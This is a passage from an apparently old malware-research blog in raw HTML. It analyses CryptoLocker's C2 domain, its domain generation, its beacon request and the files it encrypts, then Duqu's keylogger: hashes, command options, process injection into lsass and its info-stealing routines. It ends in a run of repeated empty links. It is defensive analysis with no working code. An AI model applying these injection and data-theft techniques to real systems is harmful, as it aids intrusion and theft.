*CryptoLocker="%APPDATA%\Local\<random_file_name>.exe<br />
<br />
On this malware sample, it will attempt to connect to the following hard-coded domain:<br />
<br />
xqmrainncxrwho.net<br />
<br />
After which, it will start generating domain names. This malware uses Domain Generation Algorithm(DGA). The algorithm is based from current System Date (year, month and day) and some hard-coded constants. It will generate a 14 character long domain name and appends any of the following Top Level Domain(TLD):<br />
<br />
.net<br />
.biz<br />
.ru<br />
.org<br />
.co.uk<br />
.info<br />
.com<br />
<br />
Once generated it will send the following HTTP Request:<br />
<br />
POST /home/ HTTP/1.1<br />
Accept: */*<br />
Host: <random_generated_domain><br />
Connection: Close<br />
<br />
If the server responded OK, it will create a BMP image file on the desktop with a randomly generated name. This image file contains the URL where you can download a copy of CryptoLocker:<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK8PhPr7rMGvJRR0Qv-VukmikVrDV5C1pz1nb8uxd187G4DkNEb_jibTtvTKzZHJUHf9crLMA-nvf9pVO7tgejwSPgGtm2tbKozF08pZgfeF7cX5HxS_qTCdowCxB6J7j4Ld2Cu1JOMyve/s1600/picture_message.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK8PhPr7rMGvJRR0Qv-VukmikVrDV5C1pz1nb8uxd187G4DkNEb_jibTtvTKzZHJUHf9crLMA-nvf9pVO7tgejwSPgGtm2tbKozF08pZgfeF7cX5HxS_qTCdowCxB6J7j4Ld2Cu1JOMyve/s400/picture_message.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
And then it displays its GUI that contains the ransom message. The user needs to pay USD300 to recover the encrypted documents. The payment methods that it accept are:<br />
<br />
MoneyPak<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_cqWxxKi6wlDm1CyoTA2ofs8SSMOeT6ERg_Tt4ef6m-9snDh2ejH0iQSz2jmm8qekpb_H-dQX5rKmqnqhq4wlypG-kAE32WZ5l1abK-mC7Kee_D-j7cHwzHxwpU3N3m3i_Nd1PMbnLDu2/s1600/moneypak.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_cqWxxKi6wlDm1CyoTA2ofs8SSMOeT6ERg_Tt4ef6m-9snDh2ejH0iQSz2jmm8qekpb_H-dQX5rKmqnqhq4wlypG-kAE32WZ5l1abK-mC7Kee_D-j7cHwzHxwpU3N3m3i_Nd1PMbnLDu2/s320/moneypak.PNG" width="320" /></a></div>
<br />
Bitcoin<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRUeq17nB_BCNpfAC70xZFycSDi3Us-2wHPgzkY-RFutpby0MSYMJazpNZ4q1SE2hTpbuOqHybxqUPBM2KxY5ReN0j_UsLGQQkVerEN2gwFlmeIBfMrAh2X2SAId8pgesRJVn6WgaXskrj/s1600/Bitcoin.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRUeq17nB_BCNpfAC70xZFycSDi3Us-2wHPgzkY-RFutpby0MSYMJazpNZ4q1SE2hTpbuOqHybxqUPBM2KxY5ReN0j_UsLGQQkVerEN2gwFlmeIBfMrAh2X2SAId8pgesRJVn6WgaXskrj/s320/Bitcoin.PNG" width="320" /></a></div>
<br />
<br />
This malware encrypts files using RSA algorithm. It encrypts all files that it finds which has the following extension names:<br />
<br />
*.odt *.ods *.odp<br />
*.odm *.odc *.odb<br />
*.doc *.docx *.docm<br />
*.wps *.xls *.xlsx<br />
*.xlsm *.xlsb *.xlk<br />
*.ppt *.pptx *.pptm<br />
*.mdb *.accdb *.pst<br />
*.dwg *.dxf *.dxg<br />
*.wpd *.rtf *.wb2<br />
*.pdf *.mdf *.dbf<br />
*.psd *.pdd *.eps<br />
*.ai *.indd *.cdr<br />
*.dng *.3fr *.arw<br />
*.srf *.sr2 *.bay<br />
*.crw *.cr2 *.dcr<br />
*.kdc *.erf *.mef<br />
*.mrw *.nef *.nrw<br />
*.orf *.raf *.raw<br />
*.rwl *.rw2 *.r3d<br />
*.ptx *.pef *.srw<br />
*.x3f<br />
<div>
<br /></div>
<br />
<br />
<br />
<br />Anonymoushttp://www.blogger.com/profile/09301814992710231875noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-15092430747767657302013-11-14T00:09:00.001-08:002013-11-14T00:09:49.676-08:00DETAILED ANALYSIS OF Trojan.Win32.Duqu: The Key Logger Module<ol style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;" type="I">
<li style="color: #010101; font-family: Calibri; font-size: 11pt; font-weight: bold; margin-left: -7pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 10pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">INTRODUCTION</span></div>
</li>
</ol>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">Duqu malware is a collection of malware components that together provide services to attackers. It may arrive as a Microsoft Word (.doc) that exploits Win32k TrueType font parsing engine and allows execution.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">This document will be solely focused on the key logger component of Duqu.</span></span></div>
<ol start="2" style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;" type="I">
<li style="color: #010101; font-family: Calibri; font-size: 11pt; font-weight: bold; margin-left: -7pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 10pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SUMMARY</span></div>
</li>
</ol>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The file in study is the info stealer/key logger component</span> <span style="font-size: 11pt;"><b><i>“a part”</i></b></span> <span style="font-size: 11pt;">of what is known as an APT (Advance Persistent Threat) malware Duqu.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The MD5 hash of the file is 9749d38ae9b9ddd81b50aad679ee87ec. Vipre detects this as Trojan.Win32.Duqu.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The detailed analysis will be focused on three parts:</span></span></div>
<br />
<ul><ul><span style="color: #010101; font-family: Calibri; font-size: 11pt; orphans: 2; text-align: justify; widows: 2;">
<li><span style="font-size: 11pt;">9749d38ae9b9ddd81b50aad679ee87ec – main executable</span></li>
<li><span style="font-size: 11pt;">f5ee03fed0133bb06d4cc52b0232fec0 – executable injector module</span></li>
<li><span style="font-size: 11pt;">9a9e77d2b7792fbbddcd7ce05a4eb26e – dll infostealer module</span></li>
</span></ul>
<span style="color: #010101; font-family: Calibri; font-size: 11pt; orphans: 2; text-align: justify; widows: 2;">
</span></ul>
<span style="color: #010101; font-family: Calibri; font-size: 11pt; orphans: 2; text-align: justify; widows: 2;">
</span>
<br />
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
</ul>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The original executable</span> <span style="font-size: 11pt;"><i>9749d38ae9b9ddd81b50aad679ee87ec</i></span> <span style="font-size: 11pt;">(exe) has two components, f5ee03fed0133bb06d4cc52b0232fec0 (exe) and 9a9e77d2b7792fbbddcd7ce05a4eb26e (dll) which are originally encrypted within its body.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>9749d38ae9b9ddd81b50aad679ee87ec</i></span> <span style="font-size: 11pt;">is responsible for setting up the two. It acts as a command console in which command line arguments are expected to be entered. The usage is as follows:</span></span><br />
<i style="color: #010101; font-family: Calibri; font-size: 11pt; text-align: -webkit-auto; text-indent: 13mm;">9749d38ae9b9ddd81b50aad679ee87ec.exe xxx <optional parameters></i></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>optional parameters are:</i></span></span></div>
<span style="color: #010101; font-family: Calibri; font-size: 11pt; orphans: 2; text-align: -webkit-auto; widows: 2;"></span><br />
<ul><ul><ul><span style="color: #010101; font-family: Calibri; font-size: 11pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li><span style="font-size: 11pt; text-align: -webkit-auto;">/delme - deletes the executable.</span></li>
<li><span style="font-size: 11pt; text-align: -webkit-auto;">/v - verbose logging for its own debugging purposes</span></li>
<li><span style="font-size: 11pt; text-align: -webkit-auto;">/quit - terminate spawned process (default lsass.exe) with injected .tmp file.</span></li>
<li><span style="font-size: 11pt; text-align: -webkit-auto;">/restart - restarts or spawns process (default lsass.exe) with injected .tmp file.</span></li>
<li><span style="font-size: 11pt; text-align: -webkit-auto;">/in <config file> - config file used for issuing commands on what data to steal and record to its log file, default config is loaded from one of its resource if not specified.</span></li>
<li><span style="font-size: 11pt; text-align: -webkit-auto;">/out <filename> - output file for its encrypted logs, default is ~DQx.tmp in %temp% folder if not specified.</span></li>
</span></ul>
<span style="color: #010101; font-family: Calibri; font-size: 11pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
</span></ul>
<span style="color: #010101; font-family: Calibri; font-size: 11pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
</span></ul>
<span style="color: #010101; font-family: Calibri; font-size: 11pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
</span>
<br />
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
</ul>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
</ul>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">It checks which process to inject its code to; either known antivirus processes or some known windows processes. When a target process is acquired, it spawns a suspended copy of that process in memory and manipulates its entry point to direct to its injector module’s (</span><span style="font-size: 11pt;"><i>f5ee03fed0133bb06d4cc52b0232fec0</i></span> <span style="font-size: 11pt;">) entry point before resuming.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>f5ee03fed0133bb06d4cc52b0232fec0</i></span> <span style="font-size: 11pt;">is responsible for injecting the dll module (</span><span style="font-size: 11pt;"><i>9a9e77d2b7792fbbddcd7ce05a4eb26e</i></span><span style="font-size: 11pt;">) to the newly spawned process as a thread. As a sign of infection, a “sortxxxx.nls” thread should be present (where “xxxx” can be any random hex number) within the process.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>9a9e77d2b7792fbbddcd7ce05a4eb26e</i></span> <span style="font-size: 11pt;">on the other hand steals information about the system and logs them to a tmp file. A total of 9 information stealing routines may be executed and these are the following:</span></span></div>
<span style="color: #010101; font-family: Calibri; font-size: 11pt; orphans: 2; text-align: -webkit-auto; widows: 2;"></span><br />
<ul><ul><span style="color: #010101; font-family: Calibri; font-size: 11pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li><span style="font-size: 11pt; text-align: -webkit-auto;">65h: list running processes and get account details</span></li>
<li><span style="font-size: 11pt; text-align: -webkit-auto;">66h: get available drives and information</span></li>
<li><span style="font-size: 11pt; text-align: -webkit-auto;">68h: take a screenshot</span></li>
<li><span style="font-size: 11pt; text-align: -webkit-auto;">69h: get various network information</span></li>
<li><span style="font-size: 11pt; text-align: -webkit-auto;">67h: log keyboard strokes</span></li>
<li><span style="font-size: 11pt; text-align: -webkit-auto;">6Ah: enumerate opened windows</span></li>
<li><span style="font-size: 11pt; text-align: -webkit-auto;">6Bh: enumerate network shares</span></li>
<li><span style="font-size: 11pt; text-align: -webkit-auto;">6Dh: list available files</span></li>
<li><span style="font-size: 11pt; text-align: -webkit-auto;">6Eh: enumerate computers on the domain.</span></li>
</span></ul>
<span style="color: #010101; font-family: Calibri; font-size: 11pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
</span></ul>
<span style="color: #010101; font-family: Calibri; font-size: 11pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
</span>
<br />
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
</ul>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
</ul>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">By default, it only executes 8 routines based on its configuration file, routine 6Eh: enumerate computers on the domain, is not executed.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">All these data gathered are compressed using bzip2 algorithm and then stored in a temp file ~DQxx.tmp (where xx is any hex number) located in %TEMP% directory.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 32mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<br /></div>
<ol start="3" style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;" type="I">
<li style="color: #010101; font-family: Calibri; font-size: 11pt; font-weight: bold; margin-left: -7pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 10pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">FLOWCHART</span></div>
</li>
</ol>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">Here is a diagram of the malware’s system infection routine.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXpV7tyPlHofphV8jBjefYTaagQdsDVGQvoMTrd4nDaEtCn5FmyQTznEcuCZglyGzs9JDpM20HuBFMLaAxjPI8xq8fUTSaeQVI9pcinZCb5n2RoZD0NBw0OMsONzEfkbHeXbhPu4uu/s1600/keylogger_flowchart.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXpV7tyPlHofphV8jBjefYTaagQdsDVGQvoMTrd4nDaEtCn5FmyQTznEcuCZglyGzs9JDpM20HuBFMLaAxjPI8xq8fUTSaeQVI9pcinZCb5n2RoZD0NBw0OMsONzEfkbHeXbhPu4uu/s320/keylogger_flowchart.png" width="203" /></a></div>
<br /></div>
<ol start="4" style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;" type="I">
<li style="color: #010101; font-family: Calibri; font-size: 11pt; font-weight: bold; margin-left: -7pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 10pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">INITIAL ANALYSIS</span></div>
</li>
</ol>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">At first glance, the file is a win32 executable with GUI subsystem and runs on an Intel 386 or later processors.</span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifn-XfDqRqURdniUIfmlCKrwPaAQWz_jkr6tqI0L63wGhxeKR055UnaHnpN-UJDflaVNUuKMiCPOaVzgS9Tq2Qr7xjGity2VvYukT4FvugMNBOZujCoMohiYrayJNJGdAL74_BFlwE/s1600/GUI_subsystem.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifn-XfDqRqURdniUIfmlCKrwPaAQWz_jkr6tqI0L63wGhxeKR055UnaHnpN-UJDflaVNUuKMiCPOaVzgS9Tq2Qr7xjGity2VvYukT4FvugMNBOZujCoMohiYrayJNJGdAL74_BFlwE/s320/GUI_subsystem.png" width="320" /></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div style="text-align: center;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 1: WIN32 executable with GUI subsystem.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">PEID does not recognize the file structure of 9749d38ae9b9ddd81b50aad679ee87ec and shows “Nothing found *”.</span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1BgBOxD7QdnQ2xh3VxzW-3fKj3oEhuF-5DX5CIVN3jpMLRUSRt_i_O0TaIAM2IJTcq8LZEWB5JbdIOeNKrFQ8cGAhNQigznoK-3B2YYrKK9AWlkGRM8KdJyzidYVmDaL9X5-zuBZt/s1600/PEID.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1BgBOxD7QdnQ2xh3VxzW-3fKj3oEhuF-5DX5CIVN3jpMLRUSRt_i_O0TaIAM2IJTcq8LZEWB5JbdIOeNKrFQ8cGAhNQigznoK-3B2YYrKK9AWlkGRM8KdJyzidYVmDaL9X5-zuBZt/s320/PEID.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 2: PEID found nothing!</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">But based from my past experiences in debugging malwares and research, I find it to be compiled in Microsoft Visual C++ with /GS switch. I actually arrived at this conclusion from what I have seen in its entry point for it uses Cookie Generation Security check to avoid buffer overruns. More about cookie generation security can be found in</span></span> <a href="http://msdn.microsoft.com/en-us/library/aa290051(v=vs.71).aspx"><span style="color: blue; font-family: Calibri;"><span style="font-size: 11pt;"><i><u>http://msdn.microsoft.com/en-us/library/aa290051(v=vs.71).aspx</u></i></span></span></a><span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjBufpGlY4JRn86v-0gD4WmnOqPkZT0Jog2AQgeyLrR004x4qbCMimhiNUhHyAXY4VbELAsw2W9dHyGrSppo3-6uNYNosjP1iuCPkptHb_9_4ijAKCG82ej10vBf6QxIYUrvr24WU3/s1600/cookie_generations.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjBufpGlY4JRn86v-0gD4WmnOqPkZT0Jog2AQgeyLrR004x4qbCMimhiNUhHyAXY4VbELAsw2W9dHyGrSppo3-6uNYNosjP1iuCPkptHb_9_4ijAKCG82ej10vBf6QxIYUrvr24WU3/s320/cookie_generations.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 3: Cookie Generation Security check by Microsoft</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ol start="5" style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;" type="I">
<li style="color: #010101; font-family: Calibri; font-size: 11pt; font-weight: bold; margin-left: -7pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 10pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">BLACK BOX TESTING</span></div>
</li>
</ol>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a 